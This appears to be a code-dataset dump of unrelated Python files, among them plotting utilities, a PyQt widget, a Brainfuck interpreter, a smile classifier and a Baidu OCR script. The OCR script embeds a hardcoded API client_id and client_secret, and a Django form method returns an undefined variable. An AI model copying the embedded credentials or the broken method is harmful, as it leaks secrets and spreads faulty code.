''' Return resident memory usage in bytes. '''
return _VmB('VmRSS:') - since
def stacksize(since=0.0):
''' Return stack size in bytes. '''
return _VmB('VmStk:') - since
|
18,366 | 59c1c61c850ba63ab11bc6627fe7d34153bf22c4 | #! usr/bin/env python
import sys
def main():
print 'Prime'
for n in range(2, 10):
print 'N= ',n
for x in range(2, n):
print 'X= ',x
if n % x == 0:
print n, 'NOT PRIME'
break
else:
print n, 'PRIME NUMBER'
if __name__ == '__main__':
main()
|
18,367 | a83a5ebdc059c8c0ea5b3fcb5f38703f331c89f6 | import json
from sc2 import run_game, maps, Race, Difficulty
from sc2.player import Bot, Computer
from bot import MyBot
def main():
with open("botinfo.json") as f:
info = json.load(f)
race = Race[info["race"]]
run_game(maps.get("Abyssal Reef LE"), [
Bot(race, MyBot()),
Computer(Race.Random, Difficulty.Medium)
], realtime=False, step_time_limit=2.0, game_time_limit=(60*20), save_replay_as="test.SC2Replay")
if __name__ == '__main__':
main()
|
18,368 | 1016d6b07e4c269a573efcbd4bfaa4d22701de47 | from PyQt5.QtWidgets import QWidget
from PyQt5.QtGui import QPainter, QImage
import os
class MYImage(QWidget):
def __init__(self, img_path=None, parent=None):
super(MYImage, self).__init__()
self.__init_Attributes()
self.__init_Parameters(img_path, parent)
#inits
def __init_Attributes(self):
self.__height = 128
self.__width = 128
self.__image = QImage()
self.__path = ''
def __init_Parameters(self, img_path, parent):
self.setImagePath(img_path)
if parent: self.setParent(parent)
#EVENTS
def paintEvent(self, event):
painter = QPainter()
rect = event.rect()
painter.begin(self)
painter.setRenderHint(painter.HighQualityAntialiasing)
painter.drawImage(rect, self.__image)
painter.end()
# PROPERTY
def imagePath(self): return self.__path
# METHODS
def setImagePath(self, path):
try:
if os.path.exists(path):
self.__path = path
self.__image = QImage(self.__path)
except:
pass
if __name__ == '__main__':
import sys
from PyQt5.QtWidgets import QApplication
app = QApplication([])
win = MYImage(img_path='C:/Users/Edward/Desktop/Develop/Projects/CGPM/Resources/Icons/Dialogs/error.png')
win.show()
sys.exit(app.exec_())
|
18,369 | f7ff5db54298d29526e1454eb66b05c24ec55452 | import time
import numpy as np
from src.main.utils.plotter import plot_on_one_errorbars, get_color, histogram_bars_grouped
def gen_plots_with_errbars(plots_desc, compared, range_val, func, repeat=3, save_figs=False, verbose=False):
"""
Generate series of figures with multiple plots on one piece with error bars.
:param plots_desc: description of a plots
Example:
[
{'key': 'time', 'name': 'Time vs k neighours', 'xlabel': 'k', 'ylabel': 't [s]'},
{'key': 'prec', 'name': 'Prec vs k neighours', 'xlabel': 'k', 'ylabel': 't [s]'}
]
:param compared: array of objects which we compare across others, has to contain name
Example:
[
{ 'model': Foo, 'name': 'Foo'},
{ 'model': Bar, 'name': 'Bar'}
]
:param range_val: range of values which are our x values in a chart
:param func: function which describe our logic. To the function 3 args are passed:
sink - which is a dict with specified keys in plot_desc and corresponding list for a values
compared - object from compared array
j - which is a a value from specified range_val
Example:
def func(sink, model_desc, k):
model_class = model_desc['model']
model = model_class(a=k)
start = time.time()
model.do()
end_time = time.time() - start
sink['time'].append(end_time)
r = model.get()
sink['prec'].append(r)
:param repeat: specyfy how many times repeat our function
:param save_figs: True is you want to save plots to the filesystem
:return: void
"""
def _init_y_avg():
y_val = dict()
for desc in plots_desc:
y_val[desc['key']] = {'y': list(), 'err': list()}
return y_val
def _init_list():
y_val = dict()
for desc in plots_desc:
y_val[desc['key']] = list()
return y_val
def _calc_avg(y_val, y_avg):
for desc in plots_desc:
key = desc['key']
y_avg[key]['y'].append(np.mean(y_val[key]))
y_avg[key]['err'].append(np.std(y_val[key]))
def _add_avg_to_data(index, data_lists, y_avg, case_name):
for desc in plots_desc:
key = desc['key']
data_lists[key].extend([range_val, y_avg[key]['y'], case_name, get_color(index) + '-', y_avg[key]['err']])
def _plot_data_lists(data_lists):
for desc in plots_desc:
key = desc['key']
plot_on_one_errorbars(desc['name'], desc['xlabel'], desc['ylabel'],
data_lists[key], only_ints_on_x=True, save_it=save_figs)
def _print_after_process(j_value, y_avg):
print('>>> results for value {}: '.format(j_value))
for desc in plots_desc:
key = desc['key']
print(' >>> {} - y: {}, err: {}'.format(key, y_avg[key]['y'][-1], y_avg[key]['err'][-1]))
data_lists = _init_list()
for i, compared_obj in enumerate(compared):
case_name = compared_obj['name']
y_avg = _init_y_avg()
if verbose:
print('({}) started calculation for {} case'.format(i, case_name))
for j in range_val:
y_val = _init_list()
for _ in range(repeat):
func(y_val, compared_obj, j)
_calc_avg(y_val, y_avg)
if verbose:
_print_after_process(j, y_avg)
_add_avg_to_data(i, data_lists, y_avg, case_name)
_plot_data_lists(data_lists)
def gen_grouped_histogram_bars(plots_desc, compared, range_val, func, repeat=3, save_figs=False, verbose=False,
bar_width=0.2, show_bar_values=True, figsize=None, legend_loc=0, show_legend=True):
def _init_data():
d = dict()
for desc in plots_desc:
d[desc['key']] = list()
for i in range(len(range_val)):
d[desc['key']].append([])
return d
def _init_list():
y_val = dict()
for desc in plots_desc:
y_val[desc['key']] = list()
return y_val
def _calc_avg(y_val, data_lists, val_ind):
for desc in plots_desc:
key = desc['key']
data_lists[key][val_ind].append(np.mean(y_val[key]))
def _plot_data_lists(data_lists):
xlabels = []
for c in compared:
xlabels.append(c['name'])
for desc in plots_desc:
key = desc['key']
histogram_bars_grouped(data_lists[key], xlabels, bar_labels=range_val,
ylabel=desc['ylabel'], xlabel=desc['xlabel'], title=desc['name'],
bar_width=bar_width, show_bar_values=show_bar_values, figsize=figsize,
save_fig=save_figs, legend_loc=legend_loc, show_legend=show_legend)
def _print_after_process(j_value, j_idx, data_lists):
print('>>> results for value {}: '.format(j_value))
for desc in plots_desc:
key = desc['key']
print(' >>> {} - y: {}'.format(key, data_lists[key][j_idx][-1]))
data_lists = _init_data()
for i, compared_obj in enumerate(compared):
case_name = compared_obj['name']
if verbose:
print('({}) started calculation for {} case'.format(i, case_name))
for j, val in enumerate(range_val):
y_val = _init_list()
for _ in range(repeat):
func(y_val, compared_obj, val)
_calc_avg(y_val, data_lists, j)
if verbose:
_print_after_process(val, j, data_lists)
_plot_data_lists(data_lists)
def measure_time(func, sink_list):
start = time.time()
r = func()
end_time = time.time() - start
sink_list.append(end_time)
return r
|
18,370 | 25925fc345d002b741a1bbeb96eb5ba94ac717e3 | import json
import base64
import requests
import urllib
import os
import glob
#图片转文字 程序 主要调用百度 AI 项目接口实现
#1、读取图片文件
file_path = r'g:\imgs'
pic_list =[]
#把图片文件组装进图片文件列表
for i in range(18):
pic_list.append('images_'+str(i)+'.png')
#把图片文件组装进图片文件列表
#for imgfile in sorted(glob.glob(file_path + "\*.jpg")):
# pic_list.append(imgfile)
print(pic_list)
#结果输出文件
result_file = os.path.join(file_path, 'temp.txt')
for file in pic_list:
file_name = os.path.join(file_path, file)
#读取图片文件并进行转码
with open(file_name, 'rb') as f:
pic1 = f.read()
data = dict()
data['languagetype'] = "CHN_ENG" # 识别文字
data['image'] = str(base64.b64encode(pic1), 'utf-8')
decoded_data = urllib.parse.urlencode(data)
#2、获取access_token,拼接API接口
get_token = 'https://aip.baidubce.com/oauth/2.0/token?grant_type=client_credentials&' \
'client_id=L8DSGvCxigKvQxYGGR5b6OUn&client_secret=PnLBBvgV71A12NMSEG2PECbhTFxOpmNl'
#通用文字识别
API_url = 'https://aip.baidubce.com/rest/2.0/ocr/v1/general_basic/?access_token='
#手写文字识别
#API_url = 'https://aip.baidubce.com/rest/2.0/ocr/v1/handwriting/?access_token='
#高精度文字识别
#API_url= 'https://aip.baidubce.com/rest/2.0/ocr/v1/accurate_basic/?access_token='
headers={"Content-Type": "application/x-www-form-urlencoded"}
text = requests.get(get_token).text
access_token = json.loads(text)['access_token']
#print(access_token)
url = API_url + access_token
#3、请求API接口传入数据,返回文字
response = requests.post(url, data= decoded_data, headers=headers)
#print(response.text)
words_result = json.loads(response.text)['words_result']
temp_file = open(result_file, 'a')
for words in words_result:
temp_file.writelines(words['words']+'\n')
#print(words['words'])
temp_file.close()
|
18,371 | 63a447fcb4783dc9d4f4badc1d2e1be01980e6f5 | #Using try-except block
def dic(words):
a = {}
for i in words:
try:
a[i] += 1
except KeyError: ## the famous pythonic way:
a[i] = 1 ## Halt and catch fire
return a
# >>> a='1,3,2,4,5,3,2,1,4,3,2'.split(',')
# >>> a
# ['1', '3', '2', '4', '5', '3', '2', '1', '4', '3', '2']
# >>> dic(a)
# {'1': 2, '3': 3, '2': 3, '5': 1, '4': 2}
#Without using try-catch block
def dic(words):
data = {}
for i in words:
data[i] = data.get(i, 0) + 1
return data
# >>> a
# ['1', '3', '2', '4', '5', '3', '2', '1', '4', '3', '2']
# >>> dic(a)
# {'1': 2, '3': 3, '2': 3, '5': 1, '4': 2}
|
18,372 | e871b4dfe89f6a942900021e949b2c1e46bfe98c | #-*-coding: utf-8-*-
import sys
f = open(sys.argv[1], "r")
thes = f.read()
f.close()
thesi = 0
mnhmh = [0]
thesimnhm = 0
while thesi < len(thes):
if thes[thesi] == ">":
thesimnhm += 1
if len(mnhmh) <= thesimnhm:
mnhmh.append(0)
elif thes[thesi] == "<":
thesimnhm -= 1
if thesimnhm < 0:
print("Error: Out of Limit")
sys.exit(0)
elif thes[thesi] == "+":
mnhmh[thesimnhm] += 1
if mnhmh[thesimnhm] >= 255:
mnhmh[thesimnhm] = 0
elif thes[thesi] == "-":
mnhmh[thesimnhm] -= 1
if mnhmh[thesimnhm] <= -1:
mnhmh[thesimnhm] = 255
elif thes[thesi] == ".":
print(chr(mnhmh[thesimnhm]), end="")
elif thes[thesi] == ",":
inp = input("Input requested: ")
mnhmh[thesimnhm] = ord( inp[0] )
elif thes[thesi] == "[":
if mnhmh[thesimnhm] == 0:
countOpened = 0
thesi += 1
while thesi < len(thes):
if thes[thesi] == "]" and countOpened == 0:
break
elif thes[thesi] == "[":
countOpened += 1
elif thes[thesi] == "]":
countOpened -= 1
thesi += 1
elif thes[thesi] == "]":
if mnhmh[thesimnhm] != 0:
countClosed = 0
thesi -= 1
while thesi >= 0:
if thes[thesi] == "[" and countClosed == 0:
break
elif thes[thesi] == "]":
countClosed += 1
elif thes[thesi] == "[":
countClosed -= 1
thesi -= 1
thesi += 1
print("")
|
18,373 | 89ab1859b6d7707be7b041a86ef5ba82d4bb4547 | import time
import math
import os
import cv2
import dlib
import datetime as dt
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
# Import datasets, classifiers and performance metrics
from sklearn import svm, metrics
from sklearn.utils import shuffle
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import make_scorer, accuracy_score
from sklearn.linear_model import LogisticRegression
# setting user chosen vars
images_dir = '../new_dataset'
labels_filename = 'attribute_list.csv'
# user choses grey scale or not, 0 for yes, 1 for no
grey_scale = 1
##################
# list of emotions, you can reduce this to see how your accuracy varies
emotions = ["smile", "no_smile"]
detect_obj = dlib.get_frontal_face_detector()
predict_obj = dlib.shape_predictor("../preprocessing/models/shape_predictor_68_face_landmarks.dat")
##################
# final feature enhance obtain_landmarks function
def obtain_landmarks(frame):
'''
https://www.pyimagesearch.com/2017/04/03/facial-landmarks-dlib-opencv-python/
returns array of new features found for face
'''
detections = detect_obj(frame, 1)
# For each face detected in given frame
for k,dots in enumerate(detections):
# Get landmark coords in image
shape = predict_obj(frame, dots)
xlist = []
ylist = []
# Store x and y coordinates in respective lists
for i in range(1,68):
xlist.append(float(shape.part(i).x))
ylist.append(float(shape.part(i).y))
# get means of dots to obtain center of gravity
xmean = np.mean(xlist)
ymean = np.mean(ylist)
# get the distance wrt dots
xcentral = [(x-xmean) for x in xlist]
ycentral = [(y-ymean) for y in ylist]
# divide by zero catch, these dots correspond to that of the nosebone and top right midpoint of eyebrow (29 -> mid nose, 26 -> mid-eyebrow)
if xlist[26] == xlist[29]:
noseangle = 0
else:
noseangle = int(math.atan((ylist[26]-ylist[29])/(xlist[26]-xlist[29]))*180/math.pi)
#getting offset for nosebone tilt so that nosebone is vertical in image
if noseangle < 0:
noseangle += 90
else:
noseangle -= 90
# setting up the ladmark vectors
landmarks_vector = []
for x, y, w, z in zip(xcentral, ycentral, xlist, ylist):
landmarks_vector.append(x)
landmarks_vector.append(y)
# calculate eucledian distance between point and centre of gravity
mean_eu = np.asarray((ymean,xmean))
coor_eu = np.asarray((z,w))
distance = np.linalg.norm(coor_eu-mean_eu)
# tilted image nosebone based correction, we tilt the point so that the nose bone alignes with the vertical
relative_angle = (math.atan2(y, x)*360)/(2*math.pi) # (math.atan((z-ymean)/(w-xmean))*180/math.pi) - noseangle
landmarks_vector.append(distance)
landmarks_vector.append(relative_angle)
# error handling if no faces detected
if len(detections) < 1:
return False
else:
return landmarks_vector
def pull_dataset():
'''
Pulls the full dataset (without outliers)
Used as a helper function to obtain full dataset that will be then split to user
desired train/validation/test(inference) sets.
'''
# lists keep the order
full_dataset = []
full_labels = []
lost_features = []
# collect labels
df = pd.read_csv(labels_filename, skiprows=1, index_col='file_name')
newdf = df[df.columns[1]]
# collect pre-processed images and sort them to labels
for (root, dirs, dat_files) in os.walk('{0}'.format(images_dir)):
print('starting gatherer')
for file in dat_files:
# image grayscaling at import
img = cv2.imread('{0}/{1}'.format(images_dir, file), grey_scale)
# image equalisation (to be added by user if equalisation is esteemed to be useful)
features = obtain_landmarks(img)
if features is False:
lost_features.append(file)
else:
full_dataset.append(features)
full_labels.append(int(file[:-4]))
# only select rows of interest (none outliers) and only keep 'smiling' feature to be evaluated
full_labels = newdf.loc[full_labels]
full_labels = full_labels.values.tolist()
# numpy array conversion
full_dataset = np.array(full_dataset)
full_labels = np.array(full_labels)
return full_dataset, full_labels, lost_features
# RUNNING CODE
full_dataset, full_labels, lost_features = pull_dataset()
print('Sanity Check')
print('full dataset of shape:', full_dataset.shape)
print('full labels of shape:', full_labels.shape)
print('TOTAL NUMBER OF FACES NOT DETECTED WITH OUR LANDMARKS DETECTOR (IN-BUILT, pre-trained model): {0}'.format(len(lost_features)))
# # creating classifier object as an SVM (support vector machine) probabilistic model, you can change this to any other type of classifier
# classifier = SVC(kernel='linear', probability=True, tol=1e-3)
# Reshuffling data (for extra randomness)
X_data, Y_data = shuffle(full_dataset, full_labels, random_state=0)
print('X_data of shape:', X_data.shape)
print('Y_data of shape:', Y_data.shape)
# perform train and test split (random state set to 1 to ensure same distribution accross different sets)
# this split is obviously case specific! but cross validation allows us to avoid over-fitting so lets make sure we have a validation set ready.
# Since the dataset is not extrememly large i'll be using a 60/20/20 split, meaning more or less 1000 validation and test examples and 3000 training examples, to be tested: 75/10/15
# in this case we are a little less concerned since we are evaluating smiles which are present in every case, unlike glasses
X_train, X_test, y_train, y_test = train_test_split(X_data, Y_data, test_size=0.2, random_state=1)
X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=0.2, random_state=1)
# sanity check
print('X_train of shape:', X_train.shape)
print('y_train of shape:', y_train.shape)
print('X_val of shape:', X_val.shape)
print('y_val of shape:', y_val.shape)
print('X_test of shape:', X_test.shape)
print('y_test of shape:', y_test.shape)
# creating dummy LR classifier for hyperparameterization
classifier = LogisticRegression(penalty='l2', random_state=0, multi_class='auto', max_iter=15000, n_jobs=5)
n_folds = 10
# choosing different parameter combinations to try
param_grid = {'C': [0.01, 0.1, 1],
'solver': ['lbfgs', 'sag'],
}
# type of scoring used to compare parameter combinations
acc_scorer = make_scorer(accuracy_score)
# run grid search
start_time = dt.datetime.now()
print('Start grid search at {}'.format(str(start_time)))
grid_search = GridSearchCV(classifier, param_grid, cv=n_folds, scoring=acc_scorer, n_jobs=4)
grid_obj = grid_search.fit(X_val, y_val)
# get grid search results
print(grid_obj.cv_results_)
# set the best classifier found for rbf
clf = grid_obj.best_estimator_
print(clf)
end_time = dt.datetime.now()
print('Stop grid search {}'.format(str(end_time)))
elapsed_time= end_time - start_time
print('Elapsed grid search time {}'.format(str(elapsed_time)))
# fit the best alg to the training data
start_time = dt.datetime.now()
print('Start learning with best params at {}'.format(str(start_time)))
clf.fit(X_train, y_train)
end_time = dt.datetime.now()
print('Stop learning {}'.format(str(end_time)))
elapsed_time= end_time - start_time
print('Elapsed learning time {}'.format(str(elapsed_time)))
# predict using test set
predictions = clf.predict(X_test)
print(accuracy_score(y_test, predictions))
# Now predict the value of the test
expected = y_test
print("Classification report for classifier %s:\n%s\n"
% (clf, metrics.classification_report(expected, predictions)))
cm = metrics.confusion_matrix(expected, predictions)
print("Confusion matrix:\n%s" % cm)
# plot_confusion_matrix(cm)
print("Accuracy={}".format(metrics.accuracy_score(expected, predictions)))
|
18,374 | afe3e72908133fc66f163981b9ce66751cd1ae26 | from django import forms
from register.models import Group
from django.utils import timezone
class RegisterForm(forms.ModelForm):
required_css_class = 'required'
class Meta:
model=Group
fields='__all__'
exclude=['gid','final_song','pay_status']
def __init__(self, *args, **kwargs):
super(RegisterForm, self).__init__(*args, **kwargs)
self.fields['category'].widget.attrs.update({
'class': 'ui dropdown',
})
self.fields['group_name'].widget.attrs.update({
'placeholder':'有團名的話,請告訴我們哦'
})
self.fields['cellphone'].widget.attrs.update({
'placeholder':'0987654321'
})
def clean_cid(self):
pass
return cid
def save(self,commit=True):
user = super(RegisterForm, self).save(commit=False)
if commit:
user.save()
return user
|
18,375 | 7b3c7ae78ec8b38d761037821aad2def0c99ee3f | # -*- coding: utf-8 -*-
"""
Created on Sun Feb 28 18:25:42 2021
@author: win10
"""
list1 = ["beter","matt","beter",
"matt","beter","harry",
"beter","beter","matt",
"beter", "harry","harry",
"axel","matt","beter","harry",
"beter","beter","matt","beter",
"harry","beter","matt","beter", "harry"]
b = len(list1)
list3 = []
list2 = []
for i in list1:
if i not in list2:
list2.append(i)
for a in list2:
y=list1.count(a)
if (y/b) * 100 >= 5:
list3.append(a)
print(list3)
num = int(input())
for i in range(num):
str1 = input()
for d in str1:
if str1.index(d) % 2 == 0 :
print(d ,end="")
print(" ",end="")
for x in str1:
if str1.index(x) % 2 ==1:
print(x ,end="")
print()
|
18,376 | bb8b37432293d1a9a67755ea36b4ba6446f54bdc | #!/usr/bin/env python3
# encoding: utf-8
# === This file is part of Calamares - <http://github.com/calamares> ===
#
# Calamares is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Calamares is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Calamares. If not, see <http://www.gnu.org/licenses/>.
import os
import subprocess
import libcalamares
import shutil
def run():
""" Sabayon Calamares Hack """
# Grub set background
libcalamares.utils.chroot_call(['mkdir', '-p', '/boot/grub/'])
libcalamares.utils.chroot_call(['cp', '-f', '/usr/share/grub/default-splash.png', '/boot/grub/default-splash.png'])
return None
|
18,377 | f3be57f13b87a676c435e905aa6af0752f02714d | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif'] = ['Arial']
plt.rcParams['axes.unicode_minus'] = False
def nscf_learning_curves():
train_logloss = [13.9749, 12.1171, 10.8976, 7.2394, 4.3570, 3.8065, 3.7157, 3.2558, 2.9546, 2.7440, 1.5259,
0.9440, 0.9199, 0.8933, 0.8482, 0.7984, 0.7800, 0.7760, 0.7566, 0.7202, 0.7153, 0.7126, 0.7015, 0.6928, 0.6875, 0.6818, 0.6764, 0.6648, 0.6625, 0.6584, 0.6416, 0.6307, 0.6237, 0.6235, 0.6231, 0.6167, 0.6102, 0.6044, 0.5916, 0.5734]
test_logloss = [15.7243, 13.5615, 11.4896, 8.4220, 5.8326, 4.6092, 4.0900, 3.7464, 3.6078, 3.4541, 2.9277, 2.1484,
1.6946, 1.4267, 1.3630, 1.2300, 1.1092, 0.9644, 0.9417, 0.9174, 0.8959, 0.8343, 0.8138, 0.7931,
0.7735, 0.7510, 0.7341, 0.7249, 0.7147, 0.6913, 0.6716, 0.6557, 0.6357, 0.6235, 0.6287, 0.6125,
0.6066, 0.5824, 0.6006, 0.6106]
x = np.linspace(1, len(train_logloss), len(train_logloss))
plt.figure(figsize=(6, 3))
plt.grid(linestyle="--")
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.plot(x, train_logloss, marker='o', color="SkyBlue", label="Train Data LogLoss", linewidth=1.5)
plt.plot(x, test_logloss, marker='^', color="IndianRed", label="Test Data LogLoss", linewidth=1.5)
plt.xlabel("Epochs", fontsize=6.5, fontweight='bold', labelpad=-5)
plt.ylabel("LogLoss", fontsize=6.5, fontweight='bold', labelpad=-5)
plt.legend(loc=0, numpoints=1)
leg = plt.gca().get_legend()
ltext = leg.get_texts()
plt.setp(ltext, fontsize=6, fontweight='bold')
plt.show()
def nscf_auc_curves():
x = np.array([1, 5, 10, 15, 20, 25, 30, 35, 40, 45, 50])
train_logloss = np.array([13.9749, 4.3570, 2.7440, 0.8482, 0.7202, 0.6875, 0.6584, 0.6231, 0.6044, 0.5862, 0.5418])
test_logloss = np.array([15.7243, 5.8326, 3.7541, 1.6620, 0.9174, 0.7735, 0.6913, 0.6287, 0.5824, 0.6307, 0.6744])
plt.figure(figsize=(6, 3))
plt.grid(linestyle="--")
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.plot(x, train_logloss, marker='o', color="SkyBlue", label="Train Data LogLoss", linewidth=1.5)
plt.plot(x, test_logloss, marker='^', color="IndianRed", label="Test Data LogLoss", linewidth=1.5)
plt.xlabel("Epochs", fontsize=6.5, fontweight='bold', labelpad=-5)
plt.ylabel("LogLoss", fontsize=6.5, fontweight='bold', labelpad=-5)
plt.legend(loc=0, numpoints=1)
leg = plt.gca().get_legend()
ltext = leg.get_texts()
plt.setp(ltext, fontsize=6, fontweight='bold')
plt.show()
def nscf_auc_logloss():
aucs = [0.6793, 0.6928, 0.7073, 0.6914, 0.7289, 0.7137, 0.6814, 0.6847, 0.6873]
logs = [0.6245, 0.6018, 0.5947, 0.6106, 0.5824, 0.5871, 0.6239, 0.6223, 0.6152]
x = np.arange(len(aucs))
width = 0.35
plt.figure(figsize=(6, 3))
plt.grid(linestyle="--")
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.bar(x-width/2, aucs, width, color='SkyBlue', label='AUC')
plt.bar(x+width/2, logs, width, color='IndianRed', label='LogLoss')
plt.ylabel("AUC and LogLoss")
plt.title("NS-based CF AUC and LogLoss")
xlabels = ['K=3,L=128',
'K=3,L=300',
'K=3,L=500',
'K=4,L=128',
'K=4,L=300',
'K=4,L=500',
'K=5,L=128',
'K=5,L=300',
'K=5,L=500']
plt.xticks(x, xlabels, fontsize=6)
plt.ylim(0.4, 0.9)
plt.legend()
plt.show()
def nscf_n_auc_logloss():
aucs = [0.6545, 0.6879, 0.6933, 0.7051, 0.7289, 0.7172, 0.7335, 0.7231, 0.7368]
logs = [0.6429, 0.6218, 0.6073, 0.5946, 0.5824, 0.5836, 0.5817, 0.5826, 0.5819]
x = np.arange(len(aucs))
width = 0.35
plt.figure(figsize=(6, 3))
plt.grid(linestyle="--")
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.bar(x - width / 2, aucs, width, color='SkyBlue', label='AUC')
plt.bar(x + width / 2, logs, width, color='IndianRed', label='LogLoss')
plt.ylabel("AUC and LogLoss")
plt.title("NS-based CF AUC and LogLoss")
xlabels = ['N=1*800167',
'N=2*800167',
'N=3*800167',
'N=4*800167',
'N=5*800167',
'N=6*800167',
'N=7*800167',
'N=8*800167',
'N=9*800167']
plt.xticks(x, xlabels, fontsize=6)
plt.ylim(0.4, 0.9)
plt.legend()
plt.show()
def nscf_rmse():
epochs = [1, 5, 15, 20, 25, 30, 35, 40, 45, 50]
funksvd_rmses = [1.1462, 1.0471, 0.9826, 0.9445, 0.9326, 0.9218, 0.9102, 0.9017, 0.9014, 0.9013]
svd_rmses = [1.1227, 1.0328, 0.9681, 0.9228, 0.9183, 0.8974, 0.8827, 0.8824, 0.8820, 0.8819]
random_nscf_rmses = [1.0236, 1.0130, 0.9425, 0.8944, 0.8743, 0.8728, 0.8794, 0.8771, 0.8767, 0.8757]
lda_nscf_rmses = [1.0038, 0.9811, 0.9314, 0.8874, 0.8681, 0.8630, 0.8657, 0.8602, 0.8690, 0.8625]
item2vec_nscf_rmses = [1.0015, 0.9838, 0.9228, 0.8833, 0.8633, 0.8612, 0.8611, 0.8584, 0.8547, 0.8555]
lfm_nscf_rmses = [0.9017, 0.8936, 0.8765, 0.8691, 0.8516, 0.8488, 0.8444, 0.8430, 0.8459, 0.8465]
plt.figure(figsize=(6, 3))
plt.grid(linestyle="--")
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.plot(epochs, funksvd_rmses, marker='o', color="SkyBlue", label="FunkSVD RMSE", linewidth=1.5)
plt.plot(epochs, svd_rmses, marker='^', color="IndianRed", label="SVD++ RMSE", linewidth=1.5)
plt.plot(epochs, random_nscf_rmses, marker='*', color="olive", label="Random NS-based CF RMSE", linewidth=1.5)
plt.plot(epochs, lda_nscf_rmses, marker='s', color="darkcyan", label="LDA NS-based CF RMSE", linewidth=1.5)
plt.plot(epochs, item2vec_nscf_rmses, marker='+', color="lightslategray", label="Item2Vec Ns-based CF RMSE", linewidth=1.5)
plt.plot(epochs, lfm_nscf_rmses, marker="d", color="darkmagenta", label="LFM NS-based CF RMSE", linewidth=1.5)
plt.xlabel("Epochs", fontsize=6.5, fontweight='bold', labelpad=-5)
plt.ylabel("RMSE", fontsize=6.5, fontweight='bold', labelpad=0)
plt.legend(loc=0, numpoints=1)
leg = plt.gca().get_legend()
ltext = leg.get_texts()
plt.setp(ltext, fontsize=6, fontweight='bold')
plt.show()
def nscf_model_auc_logloss():
aucs = [0.7073, 0.7143, 0.7289, 0.7317, 0.7304, 0.7378]
logs = [0.6092, 0.5931, 0.5824, 0.5752, 0.5701, 0.5685]
x = np.arange(len(aucs))
width = 0.35
plt.figure(figsize=(6, 3))
plt.grid(linestyle="--")
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.bar(x - width / 2, aucs, width, color='SkyBlue', label='AUC')
plt.bar(x + width / 2, logs, width, color='IndianRed', label='LogLoss')
plt.ylabel("AUC and LogLoss")
plt.title("NS-based CF AUC and LogLoss")
xlabels = ['FunkSVD',
'SVD++',
'Random NS-based CF',
'LDA NS based CF',
'Item2Vec NS-based CF',
'LFM NS-based CF',]
plt.xticks(x, xlabels, fontsize=5)
plt.ylim(0.4, 0.9)
plt.legend()
plt.show()
def nscf_d_auc_logloss():
aucs = [0.7207, 0.7289, 0.7324]
logs = [0.5938, 0.5824, 0.5751]
x = np.arange(len(aucs))
width = 0.35
plt.figure(figsize=(6, 3))
plt.grid(linestyle="--")
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.bar(x - width / 2, aucs, width, color='SkyBlue', label='AUC')
plt.bar(x + width / 2, logs, width, color='IndianRed', label='LogLoss')
plt.ylabel("AUC and LogLoss")
plt.title("NS-based CF AUC and LogLoss")
xlabels = ['ml-100k',
'ml-1m',
'ml-10m']
plt.xticks(x, xlabels, fontsize=8)
plt.ylim(0.4, 0.9)
plt.legend()
plt.show()
def nssd_logloss():
x = [1, 5, 10, 15, 20, 25, 30]
train_logloss = [1.53343, 0.58776, 0.02551, 0.02154, 0.01791, 0.01343, 0.01025]
test_logloss = [1.56235, 0.59634, 0.02593, 0.03697, 0.04703, 0.05191, 0.05879]
plt.figure(figsize=(6, 3))
plt.grid(linestyle="--")
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.plot(x, train_logloss, marker='o', color="SkyBlue", label="Train Data LogLoss", linewidth=1.5)
plt.plot(x, test_logloss, marker='^', color="IndianRed", label="Test Data LogLoss", linewidth=1.5)
plt.xlabel("Epochs", fontsize=6.5, fontweight='bold', labelpad=5)
plt.ylabel("LogLoss", fontsize=6.5, fontweight='bold', labelpad=-5)
plt.ylim(0.01, 0.6)
plt.legend(loc=0, numpoints=1)
leg = plt.gca().get_legend()
ltext = leg.get_texts()
plt.setp(ltext, fontsize=6, fontweight='bold')
plt.show()
def nssd_m_aud_logloss():
aucs = [0.7981, 0.8132, 0.8246]
logs = [0.4596, 0.4531, 0.4504]
x = np.arange(len(aucs))
width = 0.35
plt.figure(figsize=(6, 3))
plt.grid(linestyle="--")
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.bar(x - width / 2, aucs, width, color='SkyBlue', label='AUC')
plt.bar(x + width / 2, logs, width, color='IndianRed', label='LogLoss')
plt.ylabel("AUC and LogLoss")
plt.title("NS-based Shallow&Deep AUC and LogLoss")
xlabels = ['Wide&Deep',
'DeepFM',
'NS-based Shallow&Deep']
plt.xticks(x, xlabels, fontsize=8)
plt.ylim(0.4, 1.1)
plt.legend()
plt.show()
def plot_mae():
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['axes.unicode_minus'] = False
users = [10, 20, 30, 40, 50]
# old_maes = [0.96, 0.92, 0.87, 0.85, 0.84]
# new_maes = [0.90, 0.85, 0.82, 0.815, 0.817]
old_maes = [0.89, 0.86, 0.81, 0.795, 0.785]
new_maes = [0.82, 0.79, 0.77, 0.755, 0.757]
plt.figure(figsize=(7, 4))
plt.grid(linestyle="--")
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.plot(users, old_maes, marker='o', color="SkyBlue", label=u"传统相似用户模型", linewidth=1.5)
